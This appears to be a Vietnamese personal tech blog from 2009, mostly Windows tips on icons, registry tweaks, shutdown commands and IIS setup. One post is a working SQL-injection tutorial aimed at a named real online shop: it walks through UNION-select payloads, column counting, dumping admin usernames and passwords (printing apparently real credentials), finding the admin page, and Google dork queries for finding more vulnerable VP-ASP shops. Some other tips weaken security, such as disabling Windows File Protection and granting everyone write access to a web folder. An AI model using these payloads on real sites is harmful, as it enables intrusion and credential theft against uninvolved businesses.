Thứ Ba, 22 tháng 9, 2009

Thay đổi kích thước icon trên Vista và Windows 7

Không như Windows XP, việc thay đổi kích thước các biểu tượng trên desktop của Windows Vista tương đối dễ dàng bằng việc kết hợp phím Ctrl + nút cuộn chuột. Khi bạn giữ phím Ctrl và cuộn chuột xuống, tất cả biểu tượng sẽ thu nhỏ lại; còn khi giữ phím Ctrl và cuộn chuột lên, tất cả biểu tượng sẽ phóng to ra. Bạn hãy tùy biến kích thước icon sao cho phù hợp nhất.


* Lưu ý: Thủ thuật này cũng có thể áp dụng cho các icon của tập tin nằm trong một thư mục.

Thu nhỏ kích thước icon trên Start menu

Nguyên nhân khiến số lượng biểu tượng đặt trên giao diện Start menu hơi ít ỏi là do kích thước của chúng quá lớn. Muốn giảm kích thước của biểu tượng để có thể mở nhanh nhiều ứng dụng hơn ngay từ Start menu, bạn thực hiện như sau:

- Bấm phải chuột vào Taskbar và chọn lệnh Properties.

- Trong bảng xuất hiện, tại thẻ Start Menu, bạn bấm nút Customize... nằm bên phải mục Start menu.

- Trong hộp thoại kế tiếp, bạn kéo con chạy xuống dưới cùng, bỏ chọn mục Use large icons và nhập giá trị mới vào hộp Start menu size > Number of recent programs to display tương ứng số lượng icon sẽ đặt trên Start menu (mặc định là 9). Xong, bấm OK hai lần là hoàn tất.

Khôi phục những icon thường dùng trên desktop

Trong Windows Vista, những biểu tượng quen thuộc như Computer, Network, Control Panel... chỉ xuất hiện trên desktop khi bạn sử dụng giao diện Classic Start menu. Nếu ưa chuộng kiểu giao diện Start menu hơn, trong khi vẫn muốn những biểu tượng này đặt trên desktop để tiện xử lý, bạn làm như sau:

- Bấm phải chuột vào desktop và chọn lệnh Personalize.

- Trong bảng hiện ra, bạn bấm vào dòng Change desktop icons nằm dưới mục Task.

- Trong hộp thoại Desktop Icon Settings, tại trường Desktop icons, bạn đánh dấu chọn những biểu tượng muốn đưa lên desktop, rồi bấm OK.

Vô hiệu hóa pop-up xuất hiện khi đưa chuột vào icon

Mỗi khi bạn rê chuột đến biểu tượng của một chương trình bất kỳ trên desktop hay Start menu, luôn có một cửa sổ nhỏ (còn gọi là balloon tip) hiện ra mô tả chức năng hay đường dẫn của chương trình này. Nếu việc đó làm bạn cảm thấy khó chịu, hãy vô hiệu nó bằng cách sau:

- Vào menu Start, nhập lệnh gpedit.msc vào hộp Search và nhấn Enter.

- Trong cửa sổ Group Policy Object Editor, bạn duyệt đến nhánh User Configuration Administrative Templates Start Menu and Taskbar.

- Tiếp đến bấm đôi vào mục Remove Balloon Tips on Start Menu items trong cửa sổ bên phải. Trong hộp thoại mở ra, bạn đánh dấu mục Enabled và bấm OK

Thứ Sáu, 28 tháng 8, 2009

Khởi động và Shutdown Win XP nhanh hơn

Windows của bạn khởi động và lúc shutdown cũng khá chậm, làm cách nào đây ?

-Để giúp WindowsXP khởi động/shutdown nhanh hơn, bạn có thể tăng tốc độ hiển thị menu Start của nó. Bạn thi hành tuần tự các bước sau đây: Start-->Run-->regedit (enter), truy cập đến khoá HKEY_CURRENT_USER/Control Panel/Desktop.

Bạn sẽ thấy ở ô bên phải dòng "MenuShowDelay"=dword:50. 50 chính là giá trị mặc định của tác vụ hiển thị menu Start.

-Bạn hãy click chuột phải lên tên mục này, chọn lệnh Modify. Gõ vào mục Value data trong hộp Edit String giá trị mới là 00000000 (8 số 0). Nhấn OK.

Lúc này, key sẽ được hiển thị là : "MenuShowDelay"=dword:00000000

-Đóng cửa sổ Registry Editor lại.


Shutdown nhanh

-Bạn gõ vào hộp Open của lệnh Run trong menu Start lệnh regedit rồi nhấn OK hay Enter. Trong cửa sổ Registry Editor, bạn mở dần theo path : HKEY_CURRENT_USERControl PanelDesktop.

-Bạn thay giá trị của các key như sau (bằng cách click chuột phải lên tên từng key, chọn lệnh Modify trên menu chuột phải, điền giá trị mới vào hộp Value data của hộp thoại Edit String rồi nhấn OK) :

AutoEndTasks=1
HungAppTimeout=5000
MenuShowDelay=00000000(mặc định là 400)
WaiTSKillAppTimeout=4000 (mặc định là 20000)
WaiTSKillServiceTimeout=4000(mặc định chưa có)

Giá trị key AutoEndTasks là 1 sẽ tự động “giết” các chương trình đang treo cho bạn. Thời gian chờ để khử các ứng dụng được giảm còn 4000 (mặc định tới 20000).

-Bạn cũng cần giảm thời gian “giết” các dịch vụ Windows XP xuống tương đương. Nhưng cần phải tạo thêm key này bằng cách click chuột phải lên nền cửa sổ bên phải. Chọn trong menu pop-up lệnh New/String Value. Click chuột phải lên key mới xuất hiện có tên “New Value #1”, chọn Rename và thay tên mới cho nó là WaiTSKillServiceTimeout. Click chuột phải lên tên này, chọn lệnh Modify và xác lập giá trị Value data của nó là 4000, nhấn OK.

-Sau đó, bạn xử tiếp cái khoản thứ hai. Đó là mở theo path HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControl.
Click chuột phải lên tên WaiTSKillServiceTimeout, chọn lệnh Modify và xác lập giá trị Value data của nó là 4000, nhấn OK.

Thoát khỏi Registry Editor và restart lại máy cho các giá trị mới có hiệu lực thi hành.

Thứ Hai, 11 tháng 5, 2009

Thủ thuật với Windows XP

Bài này có sử dụng nhiều cách sửa chữa thông qua (thay đổi và lập các khoá của) Registry của hệ điều hành Microsoft Windows (các phiên bản khác nhau).
Để khởi động Registry, bạn mở trình soạn thảo Registry theo cách sau:

1.Bấm vào nút "Start". Vào mục "RUN". (Hoặc có thể vào nhanh RUN bằng cách bấm tổ hợp phím “Logo Windows” + “R”)
2.Gõ dòng lệnh: regedit
3.Chọn "OK" hoặc bấm phím "Enter" trên bàn phím.

Lưu ý: Các phần dưới đây đang được sửa chữa, sửa đổi văn phong, kiểm chứng mức độ chính xác…(mang tính kế thừa của một bài đã tồn tại). Khi đã hoàn thiện mỗi phần, mục với phiên bản Windows nào sẽ có phần ghi rõ tình trạng hoặc phiên bản tương thích của Windows đó


[sửa] THỦ THUẬT VỚI WINDOWS

[sửa] Khởi động và kết thúc phiên làm việc với Windows
Phần này trình bày các thủ thuật giúp bạn sửa chữa một số lỗi hoặc cải tiến cách khởi động và kết thúc một phiên làm việc với hệ điều hành Windows.


[sửa] Luôn kiểm tra ổ cứng khi khởi động Windows
Mục đích: Làm cho Windows luôn luôn kiểm tra tình trạng các tập dữ liệu và hệ thống các tập khi khởi động hệ điều hành
Hình thức thực hiện: Sửa đổi trong Registry
Các bước thực hiện:


1.Vào Registry:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\

2.Tìm khóa BootExecute và sửa lại thành: autocheck autochk *

Phiên bản tương thích:: Chưa kiểm tra



[sửa] =
Mục đích: Thay đổi nút Start của Windows
Hình thức thực hiện: Sửa đổi trong Registry
Các bước thực hiện:


1.Vào Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

2.Sửa đổi: Shell"="Explorer.exe
Phiên bản tương thích: Chưa kiểm tra



[sửa] Thêm một cách bảo mật khi khởi động windows
Chạy files C:\WINDOWS\system32\syskey.exe. Muốn không sử dung chức năng này thì xoá nó đi



[sửa] Khởi động lại nhanh trong Windows XP
Mục đích: Khởi động nhanh hệ thống lại trong Windows XP
Hình thức thực hiện: Sử dụng lệnh
Các bước thực hiện:


1.Vào RUN
2.Nhập lệnh: cmd (hoặc không cần nhập lệnh này)
3.Nhập lệnh: SHUTDOWN -r - t 01
4.Nhấn OK
Phiên bản tương thích: Windows XP



[sửa] Tắt máy tính trong Windows XP
Mục đích: Tắt máy tính dùng Windows một cách nhanh hơn cách thông thường
Hình thức thực hiện: Sử dụng lệnh
Các bước thực hiện:


1.Vào RUN
2.Nhập lệnh: shutdown –s –t 0 ( o = thoi gian shutdown tinh bang giây)
3.Nhấn OK
Phiên bản tương thích: Windows XP



[sửa] Tắt máy tính từ xa trong mạng LAN
Mục đích: Tắt máy tính dùng Windows một cách nhanh hơn cách thông thường
Hình thức thực hiện: Sử dụng lệnh
Các bước thực hiện:


1.Vào RUN
2.Nhập lệnh: shutdown -i , (add tên máy tính cần shutdown rồi gõ comment)
3.Nhấn OK
Phiên bản tương thích: Chưa kiểm tra



[sửa] Shutdown nhanh trong Windows với Shortcut
Trong Windows 95/98/ME và Windows XP, bạn phải chuột trên Desktop, chọn New – Shorcut.
Cửa sổ mới xuất hiện yêu cầu bạn gõ vào đường dẫn. Nếu bạn đang sử dụng Windows 95/98/ME, ta gõ: c:\windows\rundll.exe user.exe,exitwindows (Ở đây, C: là ổ đĩa cài đặt Windows). Nếu sử dụng Windows XP, gõ: SHUTDOWN -s - t 01. Nhấn Next và Finish. Bây giờ, mỗi khi muốn shutdown máy, bạn chỉ cần nhấn đúp lên shortcut vừa tạo trên Desktop.


[sửa] Shutdown trong Win 2003:
run: gpedit.msc , chon mục local computer Policy\ computer comfiguration \ administrative Templates \ system.
Trong màn hình chọn Disphay Shutdown Event > disable


[sửa] Máy không chịu Shut Down
…..Machine\software\Microsoft\WindowsNT\currentVersion\Winlogon New > String Value đặt tên là PowerdownAfterShutdown cho giá trị là 0


[sửa] Đóng Program … Not responding
Hkey-Users\Default\control Panel\destop. Tạo String Mới AutoEndTasks và gán cho giá tri là 1. Bây giờ , máy sẽ tự động đóng các chương trình ”Not responding”



[sửa] Thủ thuật thông thường

[sửa] Windows file potection:
Cách 1: ….Machine\Software\Microsoft\Windows NT\curentVersion\Winlongon Bạn sẽ tìm thấy entry FSCDisable nhập giá trị 1
Cách 2: cmd -> SFC /Scannow


[sửa] Phục hồi biểu tượng Show Desktop trên thanh Quick Launch
Khi mở nhiều cửa số mà bạn lại muốn thoát ra nhanh bằng cách nhấn vào biểu tượng Show Desktop ở thanh Quick Launch, nhưng bạn lại vô tình xoá nó đi trước kia. Đây là cách thức khôi phục lại biểu tượng Show Desktop nhanh chóng nhất.
Bạn vào Start – Run , gõ: regsvr32 /n /i:U shell32 vào hộp thoại Open và nhấn OK. Windows sẽ tự động khôi phục cho bạn biểu tượng Show Desktop trên thanh Quick Launch.


[sửa] Thay đổi tên chủ máy tính
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion


[sửa] Microsoft Search không tìm tất cả các files
Khi dùng chức năng tìm kiếm files trong Windows, Windows không tìm kiếm các files không được đăng ký. Để khắc phục tình trạng này, ta có thể tinh chỉnh trong hệ thống Registry như sau:
Mở Registry Editor, tìm đến key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ContentIndex\] và thay đổi như sau:
Value Name: FilterFilesWithUnknownExtensions
Data Type: REG_DWORD
Value: Thay đổi thành 1 để có thể tìm kiếm tất cả các files



[sửa] Ẩn user name và password của DIAL-UP :
Trước hết vào start/connect ,chọn kết nối đang dùng xoá hết name và password di sau đó chon mục save --> ok. HKEY_LOCAL_MACHINE \ SYSTEM\CurrentControlSet\Services|RasMan\parameters. New -> Dword đặt tên là DisableSavePassword và cho giá trị là 1



[sửa] Ẩn các biểu tượng trong khay hệ thống
…user\Software\Microsoft\Windows\CurrenVersion\Policies\Explore new > dword với tên là NoTrayItemsdisplay với giá trị = 1


[sửa] Cài Wallpaper mặc định cho Windows Xp :
run gõ gpedit.msc . Trong cửa sổ group Policy tìm đến mục User Configuration\Administrative template\Desktop\Active Desktop tìm đến Active Desktop Wallpaper



[sửa] Thêm Copy to & move To vào menu ngữ cảnh của windows Explore:
…ROOT\AllfilesystemObjects\shellex\ContextMenuHandlers.
Bấm chuột phải lên ContextMenuHandlers chon new > key đặt tên la Copy to, tai khóa copy to bấm đúp vào muc Default và nhập vào giá trị {c2fbb630-2971-11d1-a18c-00c04fd75d13}. Tương tự cho move to {c2fbb631-2971-11d1-a18c-00c04fd75d13}.


[sửa] Thủ thuật với phần mềm, tiện ích tích hợp sẵn

[sửa] Bản sửa lỗi cho internet Explorer
www.microsoft.com/technet/security/current.aspx(025;014)


[sửa] Outlook Expres :
nhận mail yahoo ( pop3 : 127.0.0.1 ; SMTP : mail.vnws.com)
Yahoo: (pop3 : pop.mail.yahoo.com ; smtp: smtp.mail.yahoo.com)
Gmail: (pop3 : pop.googlemail.com port : 995 ; smtp: smtp.googlemail.com port : 25)
Vnn.vn : pop 3: mail.vnn.vn port 110 ; smtp : smtp.vnn.vn port : 25)



[sửa] Khởi động nhanh chức năng System Restore
Bạn có thể thực hiện nhanh việc khởi động chức năng System Restore của Windows trong cửa sổ Commander theo các bước sau.
Chú ý: Bạn phải đăng nhập với tài khoản người quản trị (Administrator). Mở Start – Run – gõ cmd – Enter. Cửa sổ Windows Commander xuất hiện. Bạn gõ
%systemroot%\system32\restore\rstrui.exe. Nhấn Enter.
Hộp thoại của System Restore sẽ khởi động.


[sửa] Thay đổi Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Shell"="Explorer1.exe"



[sửa] Đóng các chương trình đang bị treo
Tasklist
Để đóng winword.exe đánh lệnh : taskkill /im winword.exe


[sửa] Thủ thuật với thiết đặt phần cứng trên Windows

[sửa] Truy cập ổ CD-Rom trong chế độ Safe Mode:
Giữ phím control chọn Command Prompt Only và gõ vào d:m



[sửa] Gia tăng kết nối ADSL
Gõ MSINFO32.exe tìm IRQ của card mạng, gõ sysedit , tại thẻ system.ini điền irqX=4096 vao đằng sau dòng [386enh]. Với x là số irq



[sửa] THỦ THUẬT VỚI PHẦN MỀM, DỊCH VỤ HÃNG THỨ BA

[sửa] Đổi ngôn ngữ hiển thị cho yahoo mail
edit.yahoo.com/config/set_intl
protect.login.yahoo.com/login/set_pref (tranh gia mao website yahoo)


[sửa] Đọc mail yahoo được bằng tiếng việt
Mail option>singnation, chọn mục Color and Graphics, sau đó đánh check vào tùy chọn View HTML và chèn vào đoạn mã:

Sau đó check vào ô add signature to all outgoing messages



[sửa] Cắt file khi ghost:
[C:\ghost.exe –split=n –auto] (với n là số M cần cắt) Không cho thay đổi trang chủ HomePage
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
Name: Homepage Type: REG_DWORD Data: 0x1


[sửa] Tạo nhiều hộp thư rác mailinator.com
Tắt NetBios (tắt chức năng File shareing của Window): Click phải chuột lên model, property\networking chọn internet Protcol sau đó chọn Property\Advanced\WINS Chọn Disable NetBIOS over TCP/IP


[sửa] Folder Size" column in Detailed view of a folder
Download : http://windowsxp.mvps.org/foldersize.htm
Run: regsvr32 %Systemroot%\System32\Dirsize.dll
To apply this setting for all the folder, click Tools, Folder Options. In the View tab and click Apply to all folders.
To remove , simply un-register the DLL regsvr32 /u %Systemroot%\System32\Dirsize.dll. Ignore error messages if any.



[sửa] Thủ thuật tạo shortcut cho trang web
Mở NotePad và tạo hồ sơ shortcut sau yahoo.url

[InternetShortcut]
URL=http://www.yahoo.com

[sửa] Virus
Folder.htt và desktop.ini (virus vbs.soraci) : Vào regedit find FOLDER.HTT , tìm đến khóa {5984FFE0-28D4-11CF-AE66-08002B2E1262} Xoá nó đi


[sửa] Phần mềm
Longhorn icons set 1.1 :Bộ icon giao diện cho Win Xp
Gửi tin nhắn cho ĐTDĐ: zimmschat (www.zim.biz/wireless/zimsmschat.html), (www.sacviet.com/download.asp?id=sms)
Kiểm tra hệ thống khi cài đặt chương trình installWhatch Pro www.epsilonsquare.com
Đọc files PDF : PDF reader http://foxitsoftware.com/products.htm (LB 69 tr13) Phần mền không cần cài đặt 1.9 M
Fun4word: Vui cùng các ký tự trong word
Website http://www.nhacungcap.com/sms/nhantin nhắn tin miễn phí
Website http://www.vietnamrss.com Thủ thuật Windows

[sửa] CÁC CÂU HỎI KHÁC LIÊN QUAN
Các câu hỏi liên quan đến thủ thuật Windows là nơi để các thành viên đặt câu hỏi trực tiếp khi đang sửa đổi bài viết này nhằm tránh viết vào trang sách chính.
Phần này còn chứa một số câu hỏi sưu tập được ở các nơi khác, nhưng để trả lời nó chưa đến mức phải lập một đề mục ở phần trên.
Xin vui lòng viết các câu hỏi vào đúng phần lựa mục riêng của chúng ở đây, nếu người đọc phân vân, xin viết vào mục "Chưa phân loại".


[sửa] Dịch vụ sử dụng trên Windows
Hỏi: Toi doc o dau do da viet rang Yahoo va Hotmail dung Outlook Express thi tinh phi moi dung duoc co dung vay ko?
Đáp: Đúng một phần. Yahoo! Mail chỉ cho phép truy cập POP với các tài khoản có thu phí, người sử dụng miễn phí chỉ có thể truy cập qua web.


Tuy nhiên không phải là tất cả các địa phương được cung cấp Yahoo! Mail đều như vậy (chẳng hạn người dùng tài khoản hộp thư miễn phí ở Anh có thể truy cập POP được).
Hotmail có thể truy cập thông qua Outlook Express.

Thứ Tư, 29 tháng 4, 2009

Hướng dẫn Hack JetDatabase

Đây là một ví dụ , bạn có thể thực hành ngay tại shop này
http://www.treasureshidden.com/shopp...ucts.asp?cat=9
bạn thêm vào sau 1 dấu nháy đơn '
http://www.treasureshidden.com/shopping/sh....asp?cat=9'
ok báo lỗi rồi
9' Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 912
Bạn chú ý chỗ này nhé -----------> Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9%' and hide=0 order by specialoffer desc,cname'
Khi nó báo như vậy thì ta sẽ dùng union ( bạn giữ nguyên dấu ' nhé )
Câu lệnh như sau :
union select 1 from tbluser"having 1=1--sp_password
----> http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1 from tbluser"having 1=1--sp_password
-------------%--------------chú thích-------------%----------------
Nếu nó báo thế này hoặc tương tự )
Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9'%'union select 1 from tbluser"having 1=1--sp_password and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 912
Bạn thử thay id bằng cat , thay cat bằng id hoặc xoá dấu ' xem sao
-------------------------------------------------------------------------------------
Tiếp tục nhé
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1 from tbluser"having 1=1--sp_password
Khi nó báo thế này là được rồi
Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
Lỗi vừa rồi nói rằng : có tồn tại giá trị column chứa thông tin admin
bạn cứ tiếp tục thêm số vào nhé
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2 from tbluser"having 1=1--sp_password
nó vẫn báo như vậy
Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
ta cứ tiếp tục như vậy
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3 from tbluser"having 1=1--sp_password
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4 from tbluser"having 1=1--sp_password
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4,5 from tbluser"having 1=1--sp_password
.......................
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser"having 1=1--sp_password
Cho đến khi có 1 cái bảng đẹp đẹp như sau ( ở đây là số 37 )
3
click to see more422

18Please review these other products:
----------------------------Chú thích-----------------------------
Kinh nghiệm qua nhiều lần hack của tôi là bạn nên xem line để thêm số cho nhanh . Ví dụ như ở shop này line là 912 -------> /shop$db.asp, line 912 , với line là 912 thường thì bạn phải thêm đến 37 . Còn một số nữa :
line 467 -----> thêm đến47
line 468 ------> thêm 47
line 469 -------> thêm 48
còn lại bạn tự tìm hiểu nha.Nếu không nhớ line thì bạn cứ thử 1 trong các số thường gặp sau : 34 , 37 , 47 , 48 ,54 , 83 , 84 ,92 ......( Thông thường tôi chỉ thêm đến 84 là hết kiên nhẫn nổi ) nếu bạn kiên trì thì nên thêm từng số cho chắc ăn () . Tiếp nhé
-------------------------------------------------------------------------
Bây giờ chúng ta bắt đầu lấy user and pass:• fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn• fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn ( fldusername và fldpassword là tên của 2 column trong tbluser ) ,Ở đây tôi lần lượt thay vào số 3 và số 4
Code
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37 from tbluser"having 1=1--sp_password
ok nó sẽ báo như vầy :
admin
click to see moreadmin32612 22

18Please review these other products:
-------------------------------
harvey
click to see moreboha216322

18Please review these other products:
ok shop này có 2 admin + admin pass : admin32612
+ harvey pass: boha2163
Trong trường hợp nó chỉ có thế này
3
click to see more


Please review these other products:
bạn chỉ có thể thay vào số 3 mà thôi vậy ta sẽ dùng câu lệnh như sau
union select 1,2, fldusername%2b'/'%2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37 from tbluser"having 1=1--sp_password
cái này tôi không giải thích thêm , chắc bạn hiểu rồi > OK
http://www.treasureshidden.com/shopping/sh....asp?cat=9'
Việc còn lại là tìm link admin
ta cứ thử 2 link này xem
http://www.treasureshidden.com/shopping/shopadmin.asp
http://www.treasureshidden.com/shopping/shopadmin1.asp
Nếu link admin ko phải như vậy, thi bạn dùng câu lệnh sau :
union select 1,2,fieldvalue,,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from configuration"having 1=1--sp_password
fieldvalue và configuration là gì thì bạn hiểu rồi không nói nữa. Câu lệnh này sẽ cho ra rất nhiều kết quả
bạn cứ view hết từng trang (thường có 10 trang ) thu thập các link có đuôi .asp rồi thay vào thử xem có phải link admin ko
-------------<%>-------------<%>------------------------------------------
Ngoài ra tôi xin trích thêm bài của lão vietcuongconan ( tôi thường làm theo kiểu này )
shopdisplayproducts.asp?id=1'lỗi ok! chúng ta thường sài một câu truy vấn để lấy thông tin:
CODE%20union%20select%201%20from%20"table"%27
"union select 1 from "table"'
theo kinh nghiệm tôi rút ra được một điều. đó là chúng ta có thễ dựa vào số linemà đoán số column
CODE
line191 -- 56line184 -- 47,43,53line188 -- 53,56line191 -- 48line185 -- 86,43line202 -- 84,91line208 -- 48,57line64 -- 53line211,187 -- 43line59 -- 70........
sơ bộ vậy thôi.......( các pác cũng có thể xài tool wis and wed của dora để hack....nhưng mình thì kông sài tool để hack mời các bạn tiếp)
chúng ta phải thêm đúng số column thì mới lấy thông tin được......trong trường hợp chúng ta thêm số hoài mà không thấy cái bảng nào ra cả.....vậy phải làm sao đây.....
uh. vậy là nó đã fix!bó tay sao.......không
Cách 1:các bạn đang ở file shopdisplayproducts.aspbây giờ chuyển sang fileshoptellafriend.aspshopexd.asp.......ok!tiếp tụcvd:shoptellafriend.aspline cũa nó là: 184 --> sô 47tiếp tục hack
CODE
shoptellafriend.asp?id=1%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser %27

nó ra một cái bảncó số 3hehe!lấy user vào pass nào
CODE
shoptellafriend.asp?id=1%20union%20select%201,2,fl dusername%2b'/'% 2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20t bluser%27
song xuôi, lấy link login nào.
CODEshoptellafriend.asp?id=1%20union%20select%201, 2,fi eldname%2b'/'% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,2
8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47%20from%20configuration%27
oach! sao chả thấy gì hết vậy..........hixhix....khó rồi đây........bó tay sao.
bầy giờ chúng ta so sánh nhé.nếu ở file shopdisplayproducts.asp thì nó sẽ đưa ra kết quả cho chúng ta...ở ngay hàng đâu tiên thì bị bỏ trống.và thông tin xuất hiện ở hàng thứ 2vậy cái mà chúng ta vừa lấy được là cái hàng đầu tiên (hơi khó hiểu phải không)vậy chúng ta chỉ cần đưa cái link login về hàng 1 bằng cách thay số 1 bằng
CODEfieldname='xadminpage'
------>shoptellafriend.asp?id=1 union select fieldname='xadminpage',2,fieldname%2b'/'% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47 from configuration'
ở file shopexd.asp cũng như vậy....
----------------------<%>---------------<%>-----------------------
Một số kinh nghiệm về hack shop :
_ Khi lấy được user/pass của điều hành cần dùng nó để đăng nhập server với giao thức ftp nếu "may mắn" (<----lão hackerjp nói thế ()) bạn có thể làm chủ server và không cần phải phí công nhiều trong khi hack.
_ Có một số trường hợp, site bị lỗi Injectjon nhưng hiện trang báo lỗi (khi ta thêm dấu '): The page cannot bedisplayed, bạn cần chú ý phía bên dưới nó vẫn báo lỗi đấy._ Khi hack shop bạn nên xoay nó theo nhiều chiều : thay id bằng cat , để nguyên dấu ' hoặc xoá nó đi khi ta query.........
_Khi search shop bạn cần cố gắng tìm cách search sao cho thật hiệu quả , một số từ khoá khác mà bạn cũng nên thử : VP ASP shopping
shop products
intext:"vp-asp shopping" inurl :".asp?id="
intext:"products" inurl:".asp?id="
và còn nhiều nữa bạn tự tìm hiểu thêm.
_ Tut này chỉ giúp bạn hack được những shop 1 pass ( tuy là 1 pass nhưng còn hàng triệu shop như vậy ) (cố gắng mà search)
_ Với những shop 2 pass , thực sự nếu bạn hiểu rõ những gì tôi nói ở trên , thì việc hack pass 2 ko khó...chúc may mắn ()
Hack vui vẻ nha

Thứ Hai, 16 tháng 3, 2009

Khắc phục: Power Surge on Hub Port: A USB Device has exceeded the power limits of its hub port".??

Máy của tôi luôn xuất hiện ở góc phải màn hình dòng chữ: Power Surge on Hub Port: A USB Device has exceeded the power limits of its hub port". Mỗi khi tôi mở máy in để in thì máy bị treo.

Cách khắc phục:
Cần vô hiệu hóa tính năng USB 2.0-enhanced
1. Nhân phải chuột vào My Computer, rồi chọn Manage
2. Trong mục Computer Management (Local), nhấn Device Manager
3. Trong khung Device Manager, nhấn vào dấu + của mục Universal Serial Bus controllers. Nhấn phải chuột vào Universal host controller, rồi nhấn Properties
4. Nhấn tab Advance, tick vào ổ Dont Tell Me about USB Error
5. Đóng Device Manager

Thứ Sáu, 2 tháng 1, 2009

IIS7 của Vista đọc file MDB Access bằng ASP

Dùng Vista, bạn cài IIS chạy ASP đọc file Access thường gặp một số rắc rối. Để khắc phục:

1. Vào IIS xem lại xem đã cài ASP chưa
2. Set Permission cho thư mục web có thể đọc, ghi everyone
3. Set Permission cho thư mục c:\windows\serviceprofiles\networkservice\appdata\ local\temp cho IUSR có thể đọc ghi.

Thế là xong